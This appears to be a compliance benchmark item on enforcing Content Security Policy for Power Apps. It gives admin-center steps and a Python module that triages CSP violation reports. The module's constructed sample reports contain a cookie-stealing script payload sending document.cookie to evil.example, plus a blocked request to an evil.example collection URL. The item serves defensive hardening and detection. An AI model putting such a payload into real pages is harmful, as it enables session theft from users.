MS.POWERPLATFORM.4.1v1 - Content Security Policy (CSP) SHALL be enforced for model-driven and canvas Power Apps.

Information

Enabling CSP adds a browser-enforced defense for Power Apps against common web attacks such as cross-site scripting (XSS) and clickjacking: the browser refuses to load scripts, frames and other resources that the policy does not allow, and reports the violations to the configured endpoint.

NOTE: Nessus has provided the target output to assist in reviewing the benchmark to ensure target compliance.

Solution

1. Sign in to your tenant environment's respective [Power Platform admin
center](https://learn.microsoft.com/en-us/power-platform/admin/powerapps-us-government#power-apps-us-government-service-urls).

2. On the left-hand pane click on Environments and then select an environment from the list.

3. Select the Settings icon at the top of the page.

4. Click on Product then click on Privacy + Security from the options that appear.

5. At the bottom of the page under the Content security policy section, turn the slider On for both Model-driven and Canvas.

6. At the same location, set Enable reporting to On and add an endpoint to which CSP violations can be reported.

7. Repeat steps 2 to 6 for all active Power Platform environments.
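The reporting endpoint named in step 6 receives JSON violation reports from users' browsers, and the useful work is separating the reports that matter from browser-extension noise. The following Python module is an added example, not part of this benchmark or of ScubaGear: it normalises the two report formats browsers use (the legacy `application/csp-report` body sent for `report-uri`, and the Reporting API array sent for `report-to`; which one Power Platform posts is an assumption, so both are handled) and sorts each violation into a triage bucket. The `ALLOWED_ORIGINS` set and the sample reports are constructed placeholders.

```python
"""Triage of CSP violation reports received at the endpoint from step 6.

Added example (not benchmark or ScubaGear code). Which wire format
Power Platform uses is an assumption; both browser formats are parsed.
"""
import json
from dataclasses import dataclass
from urllib.parse import urlsplit

# Assumed: origins the apps are expected to load resources from.
ALLOWED_ORIGINS = {
    "https://apps.powerapps.com",
    "https://login.microsoftonline.com",
}
EXTENSION_SCHEMES = ("chrome-extension", "moz-extension",
                     "safari-extension", "safari-web-extension")


@dataclass(frozen=True)
class Violation:
    document_url: str
    effective_directive: str
    blocked_url: str
    disposition: str   # "enforce" or "report"
    sample: str        # first bytes of the blocked inline script, if sent


def _from_legacy(report: dict) -> Violation:
    """Legacy body for report-uri: {"csp-report": {...}} with kebab-case keys."""
    body = report["csp-report"]
    return Violation(
        document_url=body.get("document-uri", ""),
        effective_directive=body.get("effective-directive")
        or body.get("violated-directive", ""),
        blocked_url=body.get("blocked-uri", ""),
        disposition=body.get("disposition", "enforce"),
        sample=body.get("script-sample", ""),
    )


def _from_reporting_api(report: dict) -> Violation:
    """Reporting API item for report-to: {"type": "csp-violation", "body": {...}}."""
    body = report["body"]
    return Violation(
        document_url=body.get("documentURL", ""),
        effective_directive=body.get("effectiveDirective", ""),
        blocked_url=body.get("blockedURL", ""),
        disposition=body.get("disposition", "enforce"),
        sample=body.get("sample", ""),
    )


def parse_csp_reports(raw: str) -> list:
    """Accept either wire format and return normalised Violation records."""
    data = json.loads(raw)
    if isinstance(data, dict) and "csp-report" in data:
        return [_from_legacy(data)]
    if isinstance(data, list):
        # Reporting API batches may mix report types; keep only CSP ones.
        return [_from_reporting_api(r) for r in data
                if r.get("type") == "csp-violation"]
    raise ValueError("not a CSP violation report")


def classify(v: Violation) -> str:
    """Bucket one violation so noise does not drown the interesting reports."""
    blocked = v.blocked_url
    if "://" in blocked:
        parts = urlsplit(blocked)
        if parts.scheme in EXTENSION_SCHEMES:
            return "extension-noise"      # a user's add-on, not the app
        origin = f"{parts.scheme}://{parts.netloc}"
        if origin in ALLOWED_ORIGINS:
            return "policy-gap"           # trusted origin the policy omits
        return "unexpected-origin"        # possible exfil or unknown dependency
    if v.effective_directive.startswith("script-src") and blocked in ("inline", "eval"):
        return "inline-script"            # injected script or unsafe-inline reliance
    return "other"


def summarize(*raw_reports: str) -> dict:
    """Count violations per triage bucket across several received bodies."""
    counts: dict = {}
    for raw in raw_reports:
        for v in parse_csp_reports(raw):
            bucket = classify(v)
            counts[bucket] = counts.get(bucket, 0) + 1
    return counts


# Constructed sample reports (not captured from a real tenant).
SAMPLE_LEGACY = json.dumps({"csp-report": {
    "document-uri": "https://apps.powerapps.com/play/e/example-env",
    "violated-directive": "script-src-elem",
    "effective-directive": "script-src-elem",
    "blocked-uri": "inline",
    "disposition": "enforce",
    "script-sample": "location='https://evil.example/?c='+document.cookie",
}})
SAMPLE_REPORTING_API = json.dumps([
    {"type": "csp-violation", "body": {
        "documentURL": "https://apps.powerapps.com/play/e/example-env",
        "effectiveDirective": "script-src-elem",
        "blockedURL": "chrome-extension://abcdefghijklmnop/content.js",
        "disposition": "enforce"}},
    {"type": "csp-violation", "body": {
        "documentURL": "https://apps.powerapps.com/play/e/example-env",
        "effectiveDirective": "connect-src",
        "blockedURL": "https://evil.example/collect",
        "disposition": "enforce"}},
    {"type": "deprecation", "body": {"id": "unrelated"}},
    {"type": "csp-violation", "body": {
        "documentURL": "https://apps.powerapps.com/play/e/example-env",
        "effectiveDirective": "frame-src",
        "blockedURL": "https://login.microsoftonline.com/common/oauth2",
        "disposition": "enforce"}},
])

if __name__ == "__main__":
    print(summarize(SAMPLE_LEGACY, SAMPLE_REPORTING_API))
```

The buckets map to actions: `extension-noise` can be dropped, `inline-script` and `unexpected-origin` go to the SOC (the `sample` field of an inline-script report often shows the injected payload), and `policy-gap` means a legitimate dependency that must be accounted for before or after switching the slider to On. Keeping reports flowing is what tells you whether enforcement broke an app rather than stopped an attack.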

See Also

https://github.com/cisagov/ScubaGear/tree/v1.5.0/

Item Details

Category: ACCESS CONTROL, SECURITY ASSESSMENT AND AUTHORIZATION, CONFIGURATION MANAGEMENT, IDENTIFICATION AND AUTHENTICATION, RISK ASSESSMENT, SYSTEM AND SERVICES ACQUISITION, SYSTEM AND COMMUNICATIONS PROTECTION, SYSTEM AND INFORMATION INTEGRITY

References: 800-53|AC-2, 800-53|AC-3, 800-53|AC-4, 800-53|AC-5, 800-53|AC-6, 800-53|CA-2, 800-53|CA-7, 800-53|CM-5, 800-53|CM-6, 800-53|CM-7, 800-53|CM-8, 800-53|IA-2, 800-53|IA-8, 800-53|RA-5, 800-53|SA-8, 800-53|SC-2, 800-53|SC-3, 800-53|SC-7, 800-53|SC-18, 800-53|SC-29, 800-53|SC-30, 800-53|SC-39, 800-53|SI-2, 800-53|SI-3, 800-53|SI-4, 800-53|SI-7, 800-53|SI-10

Plugin: microsoft_azure

Control ID: 133af0735c4f6d2d84c4db5c859cd4b452a3e1dd6f10e89b3089ecf5e086fe33